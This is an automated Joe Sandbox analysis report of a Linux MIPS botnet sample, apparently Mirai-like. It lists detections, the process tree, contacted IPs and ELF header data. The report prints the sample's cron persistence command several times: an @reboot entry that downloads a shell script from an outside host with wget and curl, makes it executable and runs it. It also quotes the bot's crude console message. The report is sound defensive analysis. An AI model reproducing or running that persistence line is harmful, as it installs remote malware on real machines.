Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mips.elf

Overview

General Information

Sample name:mips.elf
Analysis ID:1542845
MD5:2bc1855eb4297c28116e412b6705e14a
SHA1:4d8189399c887b335e1d690961e38b806948d9cd
SHA256:0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542845
Start date and time:2024-10-26 19:01:27 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 22s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mips.elf
Detection:MAL
Classification:mal68.troj.linELF@0/1@19/0
  • VT rate limit hit for: mips.elf
Command:/tmp/mips.elf
PID:6238
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • mips.elf (PID: 6238, Parent: 6158, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.elf
    • mips.elf New Fork (PID: 6240, Parent: 6238)
    • sh (PID: 6240, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6242, Parent: 6240)
        • sh New Fork (PID: 6244, Parent: 6242)
        • crontab (PID: 6244, Parent: 6242, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6243, Parent: 6240)
      • crontab (PID: 6243, Parent: 6240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • mips.elf New Fork (PID: 6245, Parent: 6238)
      • mips.elf New Fork (PID: 6309, Parent: 6245)
      • mips.elf New Fork (PID: 6311, Parent: 6245)
    • mips.elf New Fork (PID: 6247, Parent: 6238)
    • mips.elf New Fork (PID: 6262, Parent: 6238)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: mips.elfAvira: detected
Source: mips.elfReversingLabs: Detection: 15%
Source: tmp.fI62Ih.19.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 195.133.92.51 ports 8089,0,1,2,12702,7
Source: global trafficTCP traffic: 192.168.2.23:42490 -> 185.82.200.181:18483
Source: global trafficTCP traffic: 192.168.2.23:49654 -> 195.133.92.51:12702
Source: global trafficTCP traffic: 192.168.2.23:59388 -> 193.233.193.45:2052
Source: global trafficTCP traffic: 192.168.2.23:44542 -> 86.107.100.80:5854
Source: global trafficTCP traffic: 192.168.2.23:40288 -> 213.182.204.57:14442
Source: global trafficTCP traffic: 192.168.2.23:48836 -> 88.151.195.22:7336
Source: global trafficTCP traffic: 192.168.2.23:38028 -> 194.87.198.29:5090
Source: /tmp/mips.elf (PID: 6238)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.fI62Ih.19.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal68.troj.linELF@0/1@19/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6244)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6243)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6243)File: /var/spool/cron/crontabs/tmp.fI62IhJump to behavior
Source: /usr/bin/crontab (PID: 6243)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6384/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6383/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6067/cmdlineJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6386/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6385/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6311/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6388/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6387/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6379/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6389/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6380/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6391/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6390/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6382/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6393/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6381/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6392/statusJump to behavior
Source: /tmp/mips.elf (PID: 6247)File opened: /proc/6309/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6384/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6383/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6067/cmdlineJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6386/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6385/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6388/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6365/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6387/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6379/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6389/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6380/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6391/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6390/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6382/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6393/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6381/statusJump to behavior
Source: /tmp/mips.elf (PID: 6309)File opened: /proc/6392/statusJump to behavior
Source: /tmp/mips.elf (PID: 6240)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/mips.elf (PID: 6238)Queries kernel information via 'uname': Jump to behavior
Source: mips.elf, 6238.1.00005562c5e24000.00005562c5ecc000.rw-.sdmp, mips.elf, 6245.1.00005562c5e24000.00005562c5ecc000.rw-.sdmpBinary or memory string: bU!/etc/qemu-binfmt/mips
Source: mips.elf, 6238.1.00005562c5e24000.00005562c5ecc000.rw-.sdmp, mips.elf, 6245.1.00005562c5e24000.00005562c5ecc000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
Source: mips.elf, 6238.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmp, mips.elf, 6245.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.elf
Source: mips.elf, 6238.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmp, mips.elf, 6245.1.00007ffc99f3c000.00007ffc99f5d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542845 Sample: mips.elf Startdate: 26/10/2024 Architecture: LINUX Score: 68 34 195.133.92.51, 12702, 40246, 49654 AS-REGRU Russian Federation 2->34 36 213.182.204.57, 14442, 40288 M247GB Latvia 2->36 38 9 other IPs or domains 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Connects to many ports of the same IP (likely port scanning) 2->44 9 mips.elf 2->9         started        signatures3 process4 process5 11 mips.elf sh 9->11         started        13 mips.elf 9->13         started        15 mips.elf 9->15         started        17 mips.elf 9->17         started        process6 19 sh crontab 11->19         started        23 sh 11->23         started        25 mips.elf 13->25         started        27 mips.elf 13->27         started        file7 32 /var/spool/cron/crontabs/tmp.fI62Ih, ASCII 19->32 dropped 46 Sample tries to persist itself using cron 19->46 48 Executes the "crontab" command typically for achieving persistence 19->48 29 sh crontab 23->29         started        signatures8 process9 signatures10 50 Executes the "crontab" command typically for achieving persistence 29->50
SourceDetectionScannerLabelLink
mips.elf16%ReversingLabsLinux.Backdoor.Mirai
mips.elf100%AviraEXP/ELF.Agent.J.8
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
81.29.149.178
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.fI62Ih.19.drfalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.82.200.181
      unknownNetherlands
      60117HSAEfalse
      213.182.204.57
      unknownLatvia
      9009M247GBfalse
      194.87.198.29
      unknownRussian Federation
      49352LOGOL-ASRUfalse
      195.133.92.51
      unknownRussian Federation
      197695AS-REGRUtrue
      193.233.193.45
      unknownRussian Federation
      2895FREE-NET-ASFREEnetEUfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      86.107.100.80
      unknownRomania
      38995AMG-ASROfalse
      88.151.195.22
      unknownAzerbaijan
      15723AZERONLINEAZfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      185.82.200.181mpsl.elfGet hashmaliciousUnknownBrowse
        arm4.elfGet hashmaliciousUnknownBrowse
          na.elfGet hashmaliciousUnknownBrowse
            213.182.204.57hmips.elfGet hashmaliciousUnknownBrowse
              arm7.elfGet hashmaliciousUnknownBrowse
                mips.elfGet hashmaliciousUnknownBrowse
                  arm5.elfGet hashmaliciousUnknownBrowse
                    x86.elfGet hashmaliciousUnknownBrowse
                      194.87.198.29ppc.elfGet hashmaliciousUnknownBrowse
                        mips.elfGet hashmaliciousUnknownBrowse
                          arm5.elfGet hashmaliciousUnknownBrowse
                            88.151.195.22hmips.elfGet hashmaliciousUnknownBrowse
                              arm7.elfGet hashmaliciousUnknownBrowse
                                mpsl.elfGet hashmaliciousUnknownBrowse
                                  mips.elfGet hashmaliciousUnknownBrowse
                                    arm5.elfGet hashmaliciousUnknownBrowse
                                      195.133.92.51mips.elfGet hashmaliciousUnknownBrowse
                                        193.233.193.45hmips.elfGet hashmaliciousUnknownBrowse
                                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                          86.107.100.80arm.elfGet hashmaliciousUnknownBrowse
                                            hmips.elfGet hashmaliciousUnknownBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              kingstonwikkerink.dynarm.elfGet hashmaliciousUnknownBrowse
                                              • 213.182.204.57
                                              hmips.elfGet hashmaliciousUnknownBrowse
                                              • 194.87.198.29
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                              • 185.82.200.181
                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                              • 81.29.149.178
                                              ppc.elfGet hashmaliciousUnknownBrowse
                                              • 88.151.195.22
                                              mips.elfGet hashmaliciousUnknownBrowse
                                              • 88.151.195.22
                                              arm5.elfGet hashmaliciousUnknownBrowse
                                              • 88.151.195.22
                                              arm4.elfGet hashmaliciousUnknownBrowse
                                              • 88.151.195.22
                                              x86.elfGet hashmaliciousUnknownBrowse
                                              • 185.82.200.181
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 27.102.115.180
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              M247GBT52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 91.202.233.141
                                              lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 91.202.233.141
                                              Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                              • 91.202.233.141
                                              thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                              • 91.202.233.141
                                              botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 37.120.192.49
                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                              • 77.36.125.19
                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                              • 172.94.54.116
                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                              • 154.17.88.71
                                              hmips.elfGet hashmaliciousUnknownBrowse
                                              • 213.182.204.57
                                              arm7.elfGet hashmaliciousUnknownBrowse
                                              • 213.182.204.57
                                              HSAEmpsl.elfGet hashmaliciousUnknownBrowse
                                              • 185.82.200.181
                                              arm4.elfGet hashmaliciousUnknownBrowse
                                              • 185.82.200.181
                                              Copia r#U00e1pida del pago INV 00932024.exeGet hashmaliciousAgentTeslaBrowse
                                              • 194.36.191.196
                                              SecuriteInfo.com.Heur.27949.8326.docxGet hashmaliciousUnknownBrowse
                                              • 185.82.202.150
                                              Proforma Invoice NOCAP PLASTIK AMBALA.exeGet hashmaliciousAgentTeslaBrowse
                                              • 194.36.191.196
                                              ynwj.ps1Get hashmaliciousUnknownBrowse
                                              • 194.36.191.196
                                              na.elfGet hashmaliciousUnknownBrowse
                                              • 185.82.200.181
                                              RFQ SN00954666 for prosjekt CMC 40 fot container.exeGet hashmaliciousAgentTeslaBrowse
                                              • 194.36.191.196
                                              i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.82.202.195
                                              i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.82.202.195
                                              LOGOL-ASRUppc.elfGet hashmaliciousUnknownBrowse
                                              • 194.87.198.29
                                              mips.elfGet hashmaliciousUnknownBrowse
                                              • 194.87.198.29
                                              arm5.elfGet hashmaliciousUnknownBrowse
                                              • 194.87.198.29
                                              https://store.microsoft-surface.ru/noutbuki/surface-laptop-5/surface-laptop-5-15/microsoft-surface-laptop-5-15-i7-8gb-512gb-platinum-metalGet hashmaliciousUnknownBrowse
                                              • 176.99.5.94
                                              IISz6QDXkY.elfGet hashmaliciousMiraiBrowse
                                              • 176.99.9.164
                                              file.exeGet hashmaliciousRedLineBrowse
                                              • 194.87.191.171
                                              ilwj2dfs9x.elfGet hashmaliciousMiraiBrowse
                                              • 176.99.9.154
                                              pw4LXxa9IX.elfGet hashmaliciousMiraiBrowse
                                              • 176.99.9.130
                                              dXdP65yVxR.elfGet hashmaliciousMiraiBrowse
                                              • 176.99.9.157
                                              http://www.nnov.org/common/link.php?redir=http://linkedin.com+accounts%3Dsecurelogin+settings%3Dprivate@DOMs.biqscore.com/r/?userid=bGVlLmdpYnNvbkBzb3V0aHNpZGUuY29tGet hashmaliciousUnknownBrowse
                                              • 188.93.208.56
                                              AS-REGRUPO 4800040256.exeGet hashmaliciousFormBookBrowse
                                              • 194.58.112.174
                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                              • 212.24.61.227
                                              New orde.exeGet hashmaliciousFormBookBrowse
                                              • 194.58.112.174
                                              FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                              • 194.58.112.174
                                              P1 BOL.exeGet hashmaliciousUnknownBrowse
                                              • 37.140.192.179
                                              mips.elfGet hashmaliciousUnknownBrowse
                                              • 195.133.92.51
                                              z10982283782.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                              • 194.58.112.174
                                              Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 194.58.112.174
                                              zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                              • 194.58.112.174
                                              #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                              • 37.140.192.23
                                              No context
                                              No context
                                              Process:/usr/bin/crontab
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):306
                                              Entropy (8bit):5.1524408008550475
                                              Encrypted:false
                                              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQIZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJovc:8QjHig8IeHLUHYC+GABjnOGAFkz
                                              MD5:CB9EF95D1C0FD03589897E771906D58E
                                              SHA1:0232F02185227C75FA52A60A5A0589D0F973FF2B
                                              SHA-256:75AA41DE1CB29D6BF2E766C1F822EAB7D58F9955636B980623A7D0C773B31016
                                              SHA-512:D32D9D0E2D387B558A42A97A15C40D1C12A8E0B023BFA55C57366773B6DD7AADAAD17179EA79F7569CD3C2CD9DC4E8774DA3B828C0853BEE29BF0FCC9F99658E
                                              Malicious:true
                                              Reputation:low
                                              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:02:16 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                              File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):5.5039317921944155
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:mips.elf
                                              File size:101'564 bytes
                                              MD5:2bc1855eb4297c28116e412b6705e14a
                                              SHA1:4d8189399c887b335e1d690961e38b806948d9cd
                                              SHA256:0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
                                              SHA512:1074aa161b94e13c473e8cf23d6bbd6baa531854b4c110b8142ccd8e8296b6a94751e55907f9ed6aff7d1b470676c81ea5754fdfeef14f8829dc9a5e3452d26e
                                              SSDEEP:1536:uo6JSd6vTfjZ0IonWnP4MmBGSBGxJGSnuqMLHRvMNswe+fYgHIRyyR:upP5ld4MaqMjRUKuYRyyR
                                              TLSH:43A3C91E6E618FBDF368823447B78E31A35933D627E1C685E26CD6101F6024E585FFA8
                                              File Content Preview:.ELF.....................@.`...4.........4. ...(.............@...@....}0..}0.................E...E.....(..[.........dt.Q............................<...'..\...!'.......................<...'..8...!... ....'9... ......................<...'......!........'9`

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, big endian
                                              Version:1 (current)
                                              Machine:MIPS R3000
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x400260
                                              Flags:0x1007
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:101004
                                              Section Header Size:40
                                              Number of Section Headers:14
                                              Header String Table Index:13
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x4000940x940x8c0x00x6AX004
                                              .textPROGBITS0x4001200x1200x160200x00x6AX0016
                                              .finiPROGBITS0x4161400x161400x5c0x00x6AX004
                                              .rodataPROGBITS0x4161a00x161a00x1b900x00x2A0016
                                              .ctorsPROGBITS0x4580000x180000x80x00x3WA004
                                              .dtorsPROGBITS0x4580080x180080x80x00x3WA004
                                              .data.rel.roPROGBITS0x4580140x180140x100x00x3WA004
                                              .dataPROGBITS0x4580300x180300x3c80x00x3WA0016
                                              .gotPROGBITS0x4584000x184000x6280x40x10000003WAp0016
                                              .sbssNOBITS0x458a280x18a280x2c0x00x10000003WAp004
                                              .bssNOBITS0x458a600x18a280x51480x00x3WA0016
                                              .mdebug.abi32PROGBITS0xcde0x18a280x00x00x0001
                                              .shstrtabSTRTAB0x00x18a280x640x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x4000000x4000000x17d300x17d305.55520x5R E0x10000.init .text .fini .rodata
                                              LOAD0x180000x4580000x4580000xa280x5ba83.90600x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 26, 2024 19:02:18.236665964 CEST4249018483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.242149115 CEST1848342490185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:18.242252111 CEST4249018483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.265306950 CEST4249018483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.270657063 CEST1848342490185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:18.271310091 CEST4249018483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.276864052 CEST1848342490185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:18.585972071 CEST4249218483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.591593027 CEST1848342492185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:18.591686964 CEST4249218483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.605015039 CEST4249218483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.610577106 CEST1848342492185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:18.611006021 CEST4249218483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:18.616374969 CEST1848342492185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:20.333534002 CEST42836443192.168.2.2391.189.91.43
                                              Oct 26, 2024 19:02:20.708473921 CEST1848342492185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:20.708808899 CEST4249218483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:20.709352016 CEST1848342490185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:20.709961891 CEST4249018483192.168.2.23185.82.200.181
                                              Oct 26, 2024 19:02:20.714196920 CEST1848342492185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:20.715734959 CEST1848342490185.82.200.181192.168.2.23
                                              Oct 26, 2024 19:02:21.105412006 CEST4251680192.168.2.23109.202.202.202
                                              Oct 26, 2024 19:02:25.739476919 CEST4965412702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.741494894 CEST4965612702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.745692015 CEST1270249654195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:25.745814085 CEST4965412702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.745814085 CEST4965412702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.746975899 CEST1270249656195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:25.747056007 CEST4965612702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.747097969 CEST4965612702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.752252102 CEST1270249654195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:25.752321959 CEST4965412702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.752419949 CEST1270249656195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:25.752465010 CEST4965612702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:25.757664919 CEST1270249654195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:25.757781982 CEST1270249656195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:26.658152103 CEST1270249654195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:26.658240080 CEST4965412702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:26.658308983 CEST4965412702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:26.661227942 CEST1270249656195.133.92.51192.168.2.23
                                              Oct 26, 2024 19:02:26.661295891 CEST4965612702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:26.661398888 CEST4965612702192.168.2.23195.133.92.51
                                              Oct 26, 2024 19:02:31.688421965 CEST593882052192.168.2.23193.233.193.45
                                              Oct 26, 2024 19:02:31.690370083 CEST593902052192.168.2.23193.233.193.45
                                              Oct 26, 2024 19:02:31.693928003 CEST205259388193.233.193.45192.168.2.23
                                              Oct 26, 2024 19:02:31.694034100 CEST593882052192.168.2.23193.233.193.45
